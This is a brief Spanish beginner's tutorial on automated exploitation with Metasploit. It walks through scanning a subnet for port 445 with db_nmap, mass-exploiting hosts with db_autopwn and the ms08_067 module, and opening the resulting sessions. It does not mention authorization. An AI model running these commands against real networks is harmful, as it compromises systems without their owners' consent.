Nerja Technologies

Pequeño tutorial en el que explicamos como explotar una vulnerabilidad de forma automatizada para personas que estan iniciandose en este sector.

Lo primero es saber como entrar a la utilidad Metasploit. En la imagen que vereis acontinuación vereis donde esta ubicada esta misma.

Como vemos hay diferentes opciones la mas importantes son:

MsfConsole ----------> Entraremos a la utilidad metasploit atraves de consola, es la que, la mayoria de las veces utilizaremos. Ya que de esta manera podremos hacer uso de todos los servicios.

MsfGui -------------> Metasploit en modo grafico. Todo en un entorno mas amigable pero como siempre estos entornos limitan mucho sus funciones.

Bueno nos centraremos en MsfConsole.

Comenzaremos por comentaros comandos importantes que debeis conocer:

msf > help

Nos aparecera una lista con todos los comandos que se pueden utilizar en esta utilidad.

msf > load db_sqlite3 -----------> Cargamos el framework plugin

msf > db_create -----------> Creamos la base de datos para guardar los datos

msf > db_nmap -sS -PS445 -p445 -n -T Aggressive 192.168.1.0/24
-----> Con esto buscamos los equipos con el puerto 445 abierto, ya que la vulnerabilidad que vamos a usar utiliza es puerto, evidentemente en la parte "Aggressive 192.168.1.0/24" Se debe de poner la red que quiera escanear.


msf > db_autopwn -p -e -b -m ms08_067


msf > sessions -l ----------------> Miramos si hay sesiones abiertas

msf > sessions -i 1 -------> El numero lo elegimos en el listado como veras en la imagen


Y ya estamos dentro, imaginaos las cosas que nos podrian hacer entrado este punto. Asin que cuidaito. Espero que os haya sido de utilidad.